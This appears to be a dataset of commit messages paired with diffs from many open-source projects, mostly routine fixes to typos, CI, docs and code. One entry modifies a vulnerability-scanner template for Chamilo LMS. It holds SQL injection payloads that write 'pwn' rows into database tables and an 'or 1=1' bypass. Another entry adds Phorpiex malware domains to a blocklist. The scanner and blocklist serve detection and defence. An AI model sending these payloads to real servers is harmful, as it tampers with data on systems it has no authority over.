Columns: message (string, 13–484 chars), diff (string, 38–4.63k chars)
Added required pickle import. In commit the method `save_file` was added with a call to `pickle.dump`, while `pickle` is never imported.
@@ -190,6 +190,7 @@ class SentimentAnalyzer(object):
         """
         print("Saving", filename, file=sys.stderr)
         with open(filename, 'wb') as storage_file:
+            import pickle
             # The protocol=2 parameter is for python2 compatibility
             pickle.dump(content, storage_file, protocol=2)
Fix ForumChannel annotation not working for app_commands Closes
@@ -720,6 +720,7 @@ BUILT_IN_TRANSFORMERS: Dict[Any, Transformer] = {
     VoiceChannel: BaseChannelTransformer(VoiceChannel),
     TextChannel: BaseChannelTransformer(TextChannel),
     CategoryChannel: BaseChannelTransformer(CategoryChannel),
+    ForumChannel: BaseChannelTransformer(ForumChannel),
     Attachment: IdentityTransformer(AppCommandOptionType.attachment),
 }
Remove stale comment from json_serialization_test.py has been fixed and the following code snippet now works as expected. ```python >>> import cirq, sympy >>> circuit = cirq.Circuit(cirq.rx(sympy.Symbol('theta')).on(cirq.NamedQubit("q"))) >>> cirq.testing.assert_json_roundtrip_works(circuit) # works. ```
@@ -265,12 +265,6 @@ def test_fail_to_resolve():
 QUBITS = cirq.LineQubit.range(5)
 Q0, Q1, Q2, Q3, Q4 = QUBITS
 
-# TODO: Include cirq.rx in the Circuit test case file.
-# Github issue: https://github.com/quantumlib/Cirq/issues/2014
-# Note that even the following doesn't work because theta gets
-# multiplied by 1/pi:
-# cirq.Circuit(cirq.rx(sympy.Symbol('theta')).on(Q0)),
-
 ### MODULE CONSISTENCY tests
Updating check-admin.js middleware Implementing solution suggested in the comments of issue
-export default function({ store, route, redirect }) {
+export default async function({ app, store, route, redirect }) {
+  if (store.getters['projects/isEmpty']) {
+    await store.dispatch('projects/setCurrentProject', route.params.id)
+  }
   const role = store.getters['projects/getCurrentUserRole']
-  const projectRoot = '/projects/' + route.params.id
+  const projectRoot = app.localePath('/projects/' + route.params.id)
   const path = route.fullPath.replace(/\/$/g, '')
   if (!role.is_project_admin && path !== projectRoot) {
     return redirect(projectRoot)
Update CHANGELOG.md Updated the descriptions
 ## [Unreleased]
-  - Fix for query using custom-field-data.
-  - In ad-create-contact command, display-name argument now works as expected.
-  - Added detailed description for filter argument in ad-search command.
-  - Fixed the example value for custom-attribute argument description in ad-create-user and ad-create-contact commands.
+  - Fix an issue in the ***custom-field-data*** argument.
+  - Fixed an issue in the ***ad-create-contact*** command.
+  - Improved description of the ***filter*** argument in the ***ad-search*** command.
+  - Fixed the example value description for the ***custom-attribute*** argument in the ***ad-create-user*** and ***ad-create-contact*** commands.
 
 ## [19.8.0] - 2019-08-06
Remove from CODEOWNERS This is so that I don't get one new notification per Pull Request.
 # These owners will be the default owners for everything in
 # the repo. Unless a later match takes precedence,
-* @dlstadther @Tarrasch @spotify/dataex
+* @dlstadther @spotify/dataex
 
 # Specific files, directories, paths, or file types can be
 # assigned more specificially.
Correct pretty-printing of exponents in nth-root notation Closes diofant/diofant#888 Tests were adapted from diofant/diofant#889
@@ -1292,12 +1292,12 @@ def _print_nth_root(self, base, expt):
         _zZ = xobj('/', 1)
         rootsign = xobj('\\', 1) + _zZ
         # Make exponent number to put above it
-        if isinstance(expt, Rational):
+        if expt.is_Rational:
             exp = str(expt.denominator)
             if exp == '2':
                 exp = ''
         else:
-            exp = str(expt.args[0])
+            exp = str(self._print(expt.args[0]))
         exp = exp.ljust(2)
         if len(exp) > 2:
             rootsign = ' '*(len(exp) - 2) + rootsign
Fix typo in test for separate_spins Accidentally read a vasprun with Eigenval parser
@@ -711,7 +711,7 @@ class VasprunTest(PymatgenTest):
         self.assertEqual(vasprun.eigenvalues[Spin.up].shape[0], len(vasprun.actual_kpoints))
 
     def test_eigenvalue_band_properties_separate_spins(self):
-        eig = Eigenval(self.TEST_FILES_DIR / "vasprun_eig_separate_spins.xml.gz", separate_spins=True)
+        eig = Vasprun(self.TEST_FILES_DIR / "vasprun_eig_separate_spins.xml.gz", separate_spins=True)
         props = eig.eigenvalue_band_properties
         self.assertAlmostEqual(props[0][0], 2.8772, places=4)
         self.assertAlmostEqual(props[0][1], 1.2810, places=4)
travis.yml: don't restrict pip version The hotfix implemented in to fix broken builds after the release of pip 20.0 seems to be unnecessary after the release of pip 20.0.1.
@@ -21,7 +21,7 @@ addons:
     update: true
 
 install:
-  - pip install --upgrade "pip<20.0" setuptools wheel
+  - pip install --upgrade pip setuptools wheel
  - pip install -q -r dev-requirements.txt
  - pip install -q -r requirements.txt
Update DOCKER_README.md * Update DOCKER_README.md Fix typo in the docker name * Update DOCKER_README.md
@@ -85,9 +85,9 @@ If you don't have `Docker Compose` you can also use `Docker` directly to run the Here is the commands to run: ```bash -docker pull ghcr.io/openbb-finance/openbbterminal/poetry:X.Y.Z +docker pull ghcr.io/openbb-finance/openbbterminal-poetry:X.Y.Z -docker run -v ~/.openbb_terminal/:/home/python/.openbb_terminal -v ~/OpenBBUserData:/home/python/OpenBBUserData -it --rm ghcr.io/openbb-finance/openbbterminal/poetry:X.Y.Z +docker run -v ~/.openbb_terminal/:/home/python/.openbb_terminal -v ~/OpenBBUserData:/home/python/OpenBBUserData -it --rm ghcr.io/openbb-finance/openbbterminal-poetry:X.Y.Z ``` Be sure to replace `X.Y.Z` with the version you want to pull and run. @@ -122,7 +122,7 @@ docker compose run poetry Or run `Docker` directly: ```bash -docker run -v ~/.openbb_terminal:/home/python/.openbb_terminal -v ~/OpenBBUserData:/home/python/OpenBBUserData -it --rm --env DISPLAY=host.docker.internal:0.0 ghcr.io/openbb-finance/openbbterminal/poetry:X.Y.Z +docker run -v ~/.openbb_terminal:/home/python/.openbb_terminal -v ~/OpenBBUserData:/home/python/OpenBBUserData -it --rm --env DISPLAY=host.docker.internal:0.0 ghcr.io/openbb-finance/openbbterminal-poetry:X.Y.Z ``` ### X-Server on macOS @@ -150,8 +150,8 @@ xhost + $IP Now we can run the docker container, adding the display to the environment: -```bach -docker run -v ~/.openbb_terminal/:/home/python/.openbb_terminal -v ~/OpenBBUserData:/home/python/OpenBBUserData -it --rm --env-file=path/to/setenv --env DISPLAY=$IP:0 ghcr.io/openbb-finance/openbbterminal/poetry:X.Y.Z +```bash +docker run -v ~/.openbb_terminal/:/home/python/.openbb_terminal -v ~/OpenBBUserData:/home/python/OpenBBUserData -it --rm --env-file=path/to/setenv --env DISPLAY=$IP:0 ghcr.io/openbb-finance/openbbterminal-poetry:X.Y.Z ``` This container will be able to display all the same plots as the terminal interface. @@ -174,7 +174,7 @@ And run the following commands. ```bash xhost +local: -docker run -it --rm --name openbb --env-file=./.env -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix ghcr.io/openbb-finance/openbbterminal/poetry:X.Y.Z +docker run -it --rm --name openbb --env-file=./.env -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix ghcr.io/openbb-finance/openbbterminal-poetry:X.Y.Z xhost -local: ```
flesh out readiness probes to make sure the pod is serving traffic ASAP. Add documentation, and optimize to get probes passing and failing as quickly as possible
@@ -32,12 +32,21 @@ spec: periodSeconds: 5 ports: - containerPort: {{ .Values.studioApp.appPort }} + # readiness probes are checks for when the pod is ready to serve traffic. + # Note that this runs even after a pod is Ready. Reaching the failure threshold + # means the pod is taken off the routing rules, but then once it's passing + # queries, it's allowed to serve traffic once more. readinessProbe: httpGet: - path: / - port: {{ .Values.studioNginx.port }} - initialDelaySeconds: 10 - periodSeconds: 5 + path: /healthz + port: {{ .Values.studioApp.appPort }} + # start pinging for readiness at the 5 second mark. + # Once it passes, add it to the routing table + initialDelaySeconds: 5 + # Query every 2 seconds for readiness + periodSeconds: 2 + # fail 3 times before taking this app off the routing table + failureThreshold: 3 volumeMounts: - mountPath: /app/contentworkshop_static/ name: staticfiles
Skip 'error.failure' files They tend to be unreadable
@@ -55,6 +55,10 @@ class NpzGeneratorDataset(object):
             if self.file_extension not in filename or filename[0] == '.':
                 continue
 
+            # Don't load error failures -- they're bad files
+            if 'error.failure' in filename:
+                continue
+
             if success_only and 'success' not in filename:
                 continue
Update backend/main/chapters/c09_combining_booleans.py committed suggestion on line 184
@@ -181,7 +181,7 @@ Try inspecting the code with Bird's Eye. Inspect the `return` statements of each
 class AnExercise(ExerciseStep):
     """
-When we inspect it with Birdseye, we can see that:
+When we inspect it with Bird's Eye, we can see that:
 
     name == "Alice" or "Bob"
fix deploy for freebsd HG-- branch : feature/microservices
@@ -37,7 +37,7 @@ stderr_logfile = {{noc_logs}}/{{ services[srv].process_name | default("%(program stderr_logfile_maxbytes = {{ services[srv].stderr_logfile_maxbytes | default('10MB', True)}} stderr_logfile_backups = {{ services[srv].stderr_logfile_backups | default(3, True)}} stderr_events_enabled = false -environment=NOC_CONFIG="{{config_order}}"{% if not 'global' in p -%},NOC_POOL="{{ p }}"{% endif %},NOC_DC="{{ noc_dc }}",NOC_NODE="{{ ansible_nodename }}",NOC_USER="{{ noc_user }}",NOC_ROOT="{{ noc_root }}",NOC_ENV="{{ noc_env }}",NOC_LOGLEVEL="{{noc_config.config[service].loglevel }}",LD_PRELOAD={% if jemalloc_path %}"{{ jemalloc_path }}"{% endif %} +environment=NOC_CONFIG="{{config_order}}"{% if not 'global' in p -%},NOC_POOL="{{ p }}"{% endif %},NOC_DC="{{ noc_dc }}",NOC_NODE="{{ ansible_nodename }}",NOC_USER="{{ noc_user }}",NOC_ROOT="{{ noc_root }}",NOC_ENV="{{ noc_env }}",NOC_LOGLEVEL="{{noc_config.config[service].loglevel }}",LD_PRELOAD={% if not 'FreeBSD' in ansible_system and jemalloc_path %}"{{ jemalloc_path }}"{% endif %} {% endif %} {% endif %}
[metrics] Missing aggregation for node state The query was missing a group by, causing duplicate time series of the same legend if Ray restarts.
@@ -295,15 +295,15 @@ GRAFANA_PANELS = [
         unit="nodes",
         targets=[
             Target(
-                expr="ray_cluster_active_nodes{{{global_filters}}}",
+                expr="sum(ray_cluster_active_nodes{{{global_filters}}}) by (node_type)",
                 legend="Active Nodes: {{node_type}}",
             ),
             Target(
-                expr="ray_cluster_failed_nodes{{{global_filters}}}",
+                expr="sum(ray_cluster_failed_nodes{{{global_filters}}}) by (node_type)",
                 legend="Failed Nodes: {{node_type}}",
             ),
             Target(
-                expr="ray_cluster_pending_nodes{{{global_filters}}}",
+                expr="sum(ray_cluster_pending_nodes{{{global_filters}}}) by (node_type)",
                 legend="Pending Nodes: {{node_type}}",
             ),
         ],
Update phorpiex.txt From ```nemucod```
@@ -663,6 +663,40 @@ xieieieros.su xiheiufisd.su xniaeninie.su + + +# Reference: https://app.any.run/tasks/9e581c45-0809-4dd8-8007-cda84b7079a2/ + +aefoahefuaehfu.su +aefoheaofefhuu.su +aeifuaeiuafbuu.su +aeigaeizfaizef.su +aeubaefefbuuss.su +afueufuefueifo.su +aufheuafoaheuf.su +babfaehfuehfuh.su +baeiaeueauieis.su +bafbeiahighgii.su +bbfaeuuhfiaehf.su +bsigsifrruhhgd.su +buieubfiuebuuf.su +eaueaoeufuufhs.su +eauebfuiaefubg.su +egubeauefaeufu.su +faeuhoaoiehrhd.su +fafhoafouehfuh.su +gauehfeohfefhu.su +giaeijeidgieua.su +ibufhhuofouaes.su +koksfegkosoefh.su +lopiaoeufgaeid.su +oefheahfueghuh.su +oehfeoaufhuufs.su +shufourfhrufhu.su +srgbsuirbfubuf.su +tookddiwijdiss.su +uefuaebfauoeug.su + # Generic /t.php?new=1
Accommodate missing symlink targets in Guild view Was failing with an error.
@@ -197,8 +197,7 @@ class ViewDataImpl(view.ViewData): iconTooltip = "Link" return typeDesc, icon, iconTooltip, viewer - @staticmethod - def _base_file_type_info(path): + def _base_file_type_info(self, path): path_lower = path.lower() if re.search(r"\.tfevents\.", path_lower): return "Event log", "file-chart", "File", None @@ -233,9 +232,14 @@ class ViewDataImpl(view.ViewData): elif re.search(r"\.(csv|tsv)", path_lower): return "Table", "file-delimited", "Delimited", "table" else: + return self._default_file_type_info(path) + + @staticmethod + def _default_file_type_info(path): + if not os.path.exists(path): + return "File", "file", "File", None if util.is_text_file(path): return "Text file", "file-document", "Text file", "text" - else: return "File", "file", "File", None def _op_source_info(self, path):
ci: include optional merge commit number in commit check job Also add capturing group for message body.
@@ -187,7 +187,7 @@ jobs:
         uses: gsactions/commit-message-checker@v1
         with:
           pattern: |
-            ^(.*):\s*(.*)\s\(PROJQUAY-[0-9]+\)(\n.*)*$
+            ^(.*):\s*(.*)\s(\(PROJQUAY-[0-9]+\))(\s\(#[0-9]+\))?\n(\n(\n|.)*)?$
           error: 'Commit must begin with <scope>: <subject> (PROJQUAY-####)'
           flags: 'gm'
           excludeTitle: true
Fix wrong behavior of Detection Transform Function (#959). Consider the difference of the division operator between Python 2.x and Python 3.x.
@@ -91,8 +91,8 @@ class GeneralizedRCNNTransform(nn.Module):
         stride = size_divisible
         max_size = list(max_size)
-        max_size[1] = int(math.ceil(max_size[1] / stride) * stride)
-        max_size[2] = int(math.ceil(max_size[2] / stride) * stride)
+        max_size[1] = int(math.ceil(float(max_size[1]) / stride) * stride)
+        max_size[2] = int(math.ceil(float(max_size[2]) / stride) * stride)
         max_size = tuple(max_size)
 
         batch_shape = (len(images),) + max_size
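The one-line change above hinges on how `/` behaves across interpreters. A minimal sketch (not from the commit, values chosen only for illustration) of why the explicit `float()` cast matters:

```python
# In Python 2, `/` between two ints is floor division, so ceil() sees a value
# that is already rounded down; in Python 3, `/` is true division. Casting to
# float makes both interpreters round the size up to a multiple of the stride.
import math

max_dim, stride = 833, 32

# Python 2: 833 / 32 == 26       -> ceil(26) * 32 == 832  (too small)
# Python 3: 833 / 32 == 26.03... -> ceil(26.03...) * 32 == 864
padded = int(math.ceil(float(max_dim) / stride) * stride)
print(padded)  # 864 on both Python 2 and Python 3
```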
Update README.md Added citation and minor edits
@@ -27,7 +27,7 @@ The techniques include, but are not limited to: - Pruning - Quantization -- Pruning + Quantization +- Pruning and Quantization - Sparse Transfer Learning ## Installation @@ -62,7 +62,7 @@ The following table lays out the root-level files and folders along with a descr | Folder/File Name | Description | |----------------------|-----------------------------------------------------------------------------------------------------------------------| | recipes | Typical recipes for sparsifying YOLOv5 models along with any downloaded recipes from the SparseZoo. | -| yolact | Integration repository folder used to train and sparsify YOLACT models (setup_integration.sh must run first). | +| yolact | Integration repository folder used to train and sparsify YOLACT models (`setup_integration.sh` must run first). | | README.md | Readme file. | | setup_integration.sh | Setup file for the integration run from the command line. | @@ -75,7 +75,7 @@ The export process is modified such that the quantized and pruned models are corrected and folded properly. For example, the following command can be run from within the Neural Magic's -yolact repository folder to export a trained/sparsified model's checkpoint: +`yolact` repository folder to export a trained/sparsified model's checkpoint: ```bash python export.py --checkpoint ./quantized-yolact/yolact_darknet53_0_10.pth \ --recipe ./recipes/yolact.quantized.md \ @@ -85,7 +85,7 @@ python export.py --checkpoint ./quantized-yolact/yolact_darknet53_0_10.pth \ --config yolact_darknet53_config ``` -To prevent conversion of a QAT(Quantization Aware Training) Graph to a +To prevent conversion of a QAT (Quantization-Aware Training) Graph to a Quantized Graph, pass in the `--no-qat` flag: ```bash @@ -100,6 +100,16 @@ python export.py --checkpoint ./quantized-yolact/yolact_darknet53_0_10.pth \ ### DeepSparse -The [DeepSparse](https://github.com/neuralmagic/deepsparse) Engine accepts ONNX +The [DeepSparse Engine](https://github.com/neuralmagic/deepsparse) accepts ONNX formats and is engineered to significantly speed up inference on CPUs for the sparsified models from this integration. [Example](https://github.com/neuralmagic/deepsparse/tree/main/examples/yolact) scripts can be found in the DeepSparse repository. + +## Citation +```bibtex +@inproceedings{yolact-iccv2019, + author = {Daniel Bolya and Chong Zhou and Fanyi Xiao and Yong Jae Lee}, + title = {YOLACT: {Real-time} Instance Segmentation}, + booktitle = {ICCV}, + year = {2019}, +} +```
Disable flaky test_debug_info Summary: Pull Request resolved: Test Plan: Imported from OSS
@@ -1302,6 +1302,7 @@ class RpcTest(RpcAgentTestFixture):
         rpc.shutdown(graceful=False)
 
     @dist_init
+    @unittest.skip("Test is flaky. see https://github.com/pytorch/pytorch/issues/31846")
     def test_debug_info(self):
         # only test keys in this test case. Values should be covered by
         # individual module debug info tests
Add a separate build matrix entry for documentation testing. * Add a separate build matrix entry for documentation testing. This way we parallelize the unit tests with the documentation tests.
@@ -9,6 +9,11 @@ python: env: - JAX_ENABLE_X64=0 JAX_NUM_GENERATED_CASES=25 - JAX_ENABLE_X64=1 JAX_NUM_GENERATED_CASES=25 +matrix: + include: + - python: "3.7" + env: JAX_ENABLE_X64=1 JAX_ONLY_DOCUMENTATION=true + before_install: - if [[ "$TRAVIS_PYTHON_VERSION" == "2.7" ]]; then wget https://repo.continuum.io/miniconda/Miniconda2-latest-Linux-x86_64.sh -O miniconda.sh; @@ -24,10 +29,13 @@ install: - pip install jaxlib - pip install -v . # The following are needed to test the Colab notebooks and the documentation building - - conda install --yes -c conda-forge pandoc ipykernel - - conda install --yes sphinx sphinx_rtd_theme nbsphinx jupyter_client matplotlib + - if [[ "$JAX_ONLY_DOCUMENTATION" != "" ]]; then + conda install --yes -c conda-forge pandoc ipykernel; + conda install --yes sphinx sphinx_rtd_theme nbsphinx jupyter_client matplotlib; + fi script: - - pytest -n 1 tests examples -W ignore - - if [[ "$TRAVIS_PYTHON_VERSION" > "3" ]]; then - sphinx-build -M html docs build; + - if [[ "$JAX_ONLY_DOCUMENTATION" == "" ]]; then + pytest -n 1 tests examples -W ignore ; + else + sphinx-build -b html -D nbsphinx_execute=always docs docs/build/html; fi
Updated chamilo-lms-sqli.yaml Uses SQL injection to insert data into the database, then checks to see if this data has been added;
id: chamilo-lms-sqli - info: author: undefl0w name: Chamilo LMS SQL Injection severity: high description: Finds sql injection in Chamilo version 1.11.14 - tags: chamilo,sqli - + tags: 'chamilo,sqli' requests: - raw: - - | - POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1 + - > + POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags + HTTP/1.1 + + Host: {{Hostname}} + + Content-Type: application/x-www-form-urlencoded + + + "type=image&field_id=image&tag=image&from=image&search=image&options=["test'); + INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, + 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES + (16, 16,'pwn'); INSERT INTO extra_field_options(option_value) VALUES + ('pwn'); INSERT INTO tag(id,tag,field_id ) VALUES (16,'pwn',16); -- + "]" + - > + POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags + HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - type=image&field_id=image&tag=image&from=image&search=image&options=["test'); SELECT SLEEP(1.5); -- "] + type=image&field_id=image&tag=image&from=image&search=image&options=["notthetag') + or 1=1 -- "] matchers: - - type: dsl - dsl: - - 'duration>=2' + - type: word + words: + - pwn
framework: Initialize $testSummary for exceptions. $testSummary wasn't initialized when a test exception occurred. This meant that a previously set $testSummary variable was passed to an aborted test.
@@ -202,10 +202,10 @@ Function Run-TestsOnCycle ([string] $cycleName, [xml] $xmlConfig, [string] $Dist $junitReport.StartLogTestCase("LISAv2Test","$currentTestName","$($testCycle.cycleName)") Set-Variable -Name currentTestData -Value $currentTestData -Scope Global - try { - $testResult = @() + $testResult = "" + $testSummary = "" Write-LogInfo "~~~~~~~~~~~~~~~TEST STARTED : $currentTestName~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" - + try { $CurrentTestResult = Run-Test -CurrentTestData $currentTestData -XmlConfig $xmlConfig ` -Distro $Distro -LogDir $CurrentTestLogDir -VMUser $user -VMPassword $password ` -ExecuteSetup $shouldRunSetupForIteration -ExecuteTeardown $shouldRunTeardownForIteration
Deseasonify: `pop` from remaining icons rather than unpack This should be more readable.
@@ -357,7 +357,7 @@ class BrandingManager(commands.Cog):
             log.info("Reset & shuffle remaining icons")
             await self._reset_remaining_icons()
 
-        next_up, *self.remaining_icons = self.remaining_icons
+        next_up = self.remaining_icons.pop(0)
         success = await self.bot.set_icon(next_up.download_url)
 
         return success
Update batch_beam_search_online_sim.py typo: The exxtended hypothesis -> The extended hypothesis
@@ -260,7 +260,7 @@ class BatchBeamSearchOnlineSim(BatchBeamSearch):
             hyps (Hypothesis): Current list of hypothesis
 
         Returns:
-            Hypothesis: The exxtended hypothesis
+            Hypothesis: The extended hypothesis
 
         """
         for k, d in self.scorers.items():
Update ci_chemistry_psi4.yml psi4 conda support for python 3.7 stopped
@@ -16,7 +16,7 @@ jobs:
     runs-on: ubuntu-latest
     strategy:
       matrix:
-        python-version: [3.7]
+        python-version: [3.8]
 
     steps:
     - uses: actions/checkout@v2
@@ -50,7 +50,7 @@ jobs:
        source $HOME/.bashrc
        source $CONDABASE/bin/activate
        conda activate test_psi4
-        conda install psi4 -c psi4
+        conda install psi4 python=3.8 -c psi4
        python -m pip install --upgrade pip
        python -m pip install -r requirements.txt
        python -m pip install -e .
Prevent job kind filenames from getting too long Many filesystems can't handle path components longer than 256 characters. This should fix
@@ -355,7 +355,7 @@ class FileJobStore(AbstractJobStore): def _supportsUrl(cls, url, export=False): return url.scheme.lower() == 'file' - def _makeStringFilenameSafe(self, arbitraryString): + def _makeStringFilenameSafe(self, arbitraryString, maxLength=240): """ Given an arbitrary string, produce a filename-safe though not necessarily unique string based on it. @@ -364,6 +364,9 @@ class FileJobStore(AbstractJobStore): other nonempty filename-safe string. :param str arbitraryString: An arbitrary string + :param int maxLength: Maximum length of the result, to keep it plus + any prefix or suffix under the filesystem's + path component length limit :return: A filename-safe string """ @@ -378,8 +381,8 @@ class FileJobStore(AbstractJobStore): if len(parts) == 0: parts.append("UNPRINTABLE") - # Glue it all together - return '_'.join(parts) + # Glue it all together, and truncate to length + return '_'.join(parts)[:maxLength] def writeFile(self, localFilePath, jobStoreID=None, cleanup=False): absPath = self._getUniqueFilePath(localFilePath, jobStoreID, cleanup)
[Migrations] Filter to select migration scripts Added a filter to run only specific migration scripts using a glob expression. This is especially useful for development purposes when testing a new script.
@@ -15,9 +15,10 @@ import argparse import asyncio import importlib.util import logging -import os import sys +from pathlib import Path from types import ModuleType +from typing import Iterable, Optional from configmanager import Config @@ -61,6 +62,14 @@ def cli_parse() -> argparse.Namespace: type=str, help="Path to the private key file, if any. Only used to upgrade the key to the latest format.", ) + parser.add_argument( + "--filter-scripts", + action="store", + required=False, + type=str, + help="A filter for migration scripts. If specified, only the files " + "matching the provided glob expression will be run.", + ) parser.add_argument( "--verbose", "-v", @@ -94,6 +103,18 @@ def import_module_from_path(path: str) -> ModuleType: return migration_module +def list_migration_scripts( + migrations_dir: Path, glob_expression: Optional[str] +) -> Iterable[Path]: + migration_scripts = set(migrations_dir.glob("*.py")) + if glob_expression: + migration_scripts = migration_scripts & set( + migrations_dir.glob(glob_expression) + ) + + return migration_scripts + + async def main(args: argparse.Namespace): log_level = logging.DEBUG if args.verbose else logging.INFO setup_logging(log_level) @@ -102,16 +123,16 @@ async def main(args: argparse.Namespace): config = init_config(args.config) init_db_globals(config=config) - migration_scripts_dir = os.path.join(os.path.dirname(__file__), "scripts") + migration_scripts_dir = Path(__file__).parent / "scripts" migration_scripts = sorted( - f for f in os.listdir(migration_scripts_dir) if f.endswith(".py") + list_migration_scripts(migration_scripts_dir, args.filter_scripts) ) command = args.command for migration_script in migration_scripts: - migration_script_path = os.path.join(migration_scripts_dir, migration_script) - migration_module = import_module_from_path(migration_script_path) + migration_script_path = migration_scripts_dir / migration_script + migration_module = import_module_from_path(str(migration_script_path)) if args.verbose: LOGGER.info(f"%s: %s", migration_script, migration_module.__doc__)
Dev Requirements add a comment about pinned requirements
@@ -18,7 +18,7 @@ bash scripts/install_gradio.sh ### To install the local development version of Gradio -* Navigate to the repo folder and install test requirements +* Navigate to the repo folder and install test requirements (note that it is highly recommended to use a virtual environment since the versions are pinned) ``` bash scripts/install_test_requirements.sh
DOC: Cleanup setuptools_scm version on readthedocs. setuptools_scm versions dirty commits differently from versioneer. It appends a dot-date, e.g. '.2022060'.
@@ -93,7 +93,7 @@ finally:
 # 2. remove the 0.0 version created by setuptools_scm when clone is too shallow
 if on_rtd:
     import re
-    p1 = re.compile(r'\+dirty$')
+    p1 = re.compile(r'\.d\d{8}$')
     if p1.match(version):
         version = p1.sub('', version)
Barf when module not found, without breaking hot reloading Summary: Test Plan: Manual Reviewers: schrockn, natekupp
@@ -52,7 +52,13 @@ observer.schedule(handler, '.', True)
 observer.start()
 
 try:
+    # We want to let the AutoRestartTrick do its thing (stopping dagit and restarting it on every
+    # observed filesystem change) until either a user interrupts it or dagit exits on its own.
     while True:
+        # handler.process is None during an auto restart, so we keep looping; otherwise we check
+        # to see whether the dagit process has exited.
+        if handler.process and handler.process.poll():
+            raise KeyboardInterrupt()
         time.sleep(1)
 except KeyboardInterrupt:
     handler.stop()
Adds a min-magnitude threshold to ChoiEigenvalueBarPlot. Avoids plotting O(1e-13) "zero" eigenvalues as red or gray bars on these plots (in particular for target gates).
@@ -2089,10 +2089,11 @@ class ChoiEigenvalueBarPlot(WorkspacePlot):
             hoverinfo='text'
         )
 
+        LOWER_LOG_THRESHOLD = -6 #so don't plot all the way down to, e.g., 1e-13
         ys = _np.clip(ys, 1e-30, 1e100) #to avoid log(0) errors
         log_ys = _np.log10(_np.array(ys,'d'))
-        minlog = _np.floor(min(log_ys))
-        maxlog = _np.ceil(max(log_ys))
+        minlog = max( _np.floor(min(log_ys)), LOWER_LOG_THRESHOLD)
+        maxlog = max(_np.ceil(max(log_ys)), minlog+1)
 
         #Set plot size and margins
Fix db cluster status check, allow more replicas * The master can have more replicas than the number of db nodes in our db_nodes table. * A customer can have an extra node replicating from the cluster. For example in geo repl use case.
@@ -384,7 +384,7 @@ def _get_db_cluster_status(db_service, expected_nodes_number):
     if not sync_replica:
         return ServiceStatus.FAIL
 
-    if (len(master_replications_state) != expected_nodes_number - 1 or
+    if (len(master_replications_state) < expected_nodes_number - 1 or
             not all_replicas_streaming):
         return ServiceStatus.DEGRADED
MPI->mpi typo
@@ -71,7 +71,7 @@ expressions. Examples of how to define operators are provided:
   `examples/seismic/tutorials`.
 * A set of tutorial notebooks concerning the Devito compiler can be found in
   `examples/compiler`.
-* Devito with MPI can be explored in `examples/MPI`.
+* Devito with MPI can be explored in `examples/mpi`.
 * Example implementations of acoustic forward, adjoint, gradient and born
   operators for use in full-waveform inversion (FWI) methods can be found in
   `examples/seismic/acoustic`.
Update cd.rst typo fix: "dpeloyment" -> "deployment"
@@ -254,5 +254,5 @@ creating your secret in Secrets Manager.
           GithubRepoName=repo-name \
       --capabilities CAPABILITY_IAM
 
-We've now created a dpeloyment pipeline that will automatically deploy our
+We've now created a deployment pipeline that will automatically deploy our
 Chalice app whenever we push to our GitHub repository.
Relax field requirements when intending to Remove... Fixes issue. Make the explainer link, i2i link, doc link, and spec link fields optional for features in the "Remove" intent stage.
@@ -83,7 +83,7 @@ const FORM_FIELD_GRAPH = {
     INTENT_EXPERIMENT: VISIBLE_OPTIONAL,
     INTENT_EXTEND_TRIAL: VISIBLE_OPTIONAL,
     INTENT_IMPLEMENT_SHIP: HIDDEN,
-    INTENT_SHIP: VISIBLE_OPTIONAL,
+    INTENT_SHIP: VISIBLE_REQUIRED,
     INTENT_REMOVE: VISIBLE_OPTIONAL,
   },
   'explainer_links': {
@@ -93,7 +93,7 @@ const FORM_FIELD_GRAPH = {
     INTENT_EXTEND_TRIAL: HIDDEN,
     INTENT_IMPLEMENT_SHIP: VISIBLE_REQUIRED,
     INTENT_SHIP: VISIBLE_REQUIRED,
-    INTENT_REMOVE: VISIBLE_REQUIRED,
+    INTENT_REMOVE: VISIBLE_OPTIONAL,
   },
   'doc_links': {
     INTENT_NONE: VISIBLE_OPTIONAL,
@@ -102,7 +102,7 @@ const FORM_FIELD_GRAPH = {
     INTENT_EXTEND_TRIAL: HIDDEN,
     INTENT_IMPLEMENT_SHIP: VISIBLE_REQUIRED,
     INTENT_SHIP: HIDDEN,
-    INTENT_REMOVE: VISIBLE_REQUIRED,
+    INTENT_REMOVE: VISIBLE_OPTIONAL,
   },
   'spec_link': {
     INTENT_NONE: VISIBLE_OPTIONAL,
@@ -111,7 +111,7 @@ const FORM_FIELD_GRAPH = {
     INTENT_EXTEND_TRIAL: VISIBLE_OPTIONAL,
     INTENT_IMPLEMENT_SHIP: VISIBLE_REQUIRED,
     INTENT_SHIP: VISIBLE_REQUIRED,
-    INTENT_REMOVE: VISIBLE_REQUIRED,
+    INTENT_REMOVE: VISIBLE_OPTIONAL,
   },
   'standardization': {
     INTENT_NONE: VISIBLE_OPTIONAL,
astnode_types_ada.mako: minor reformatting TN:
% if logic_vars: procedure Assign_Names_To_Logic_Vars_Impl (Node : access ${type_name}); - -- Debug helper: Assign names to every logical variable in the root node, - -- so that we can trace logical variables. + -- Debug helper: Assign names to every logical variable in the root + -- node, so that we can trace logical variables. % endif ## Public field getters % if cls.env_spec.adds_env: overriding function Node_Env (Node : access ${type_name}; - E_Info : Entity_Info := No_Entity_Info) return AST_Envs.Lexical_Env; + E_Info : Entity_Info := No_Entity_Info) + return AST_Envs.Lexical_Env; % endif % endif % endif % if logic_vars: - procedure Assign_Names_To_Logic_Vars_Impl - (Node : access ${type_name}) - is + procedure Assign_Names_To_Logic_Vars_Impl (Node : access ${type_name}) is begin % for f in logic_vars: Node.${f.name}.Dbg_Name := -- Initial_Env_Getter_Fn -- --------------------------- - function ${env_getter} (E : Entity) return AST_Envs.Lexical_Env - is + function ${env_getter} (E : Entity) return AST_Envs.Lexical_Env is Self : constant ${cls.name} := ${cls.name} (E.El); ## Define this constant so that the expressions below, which are expanded
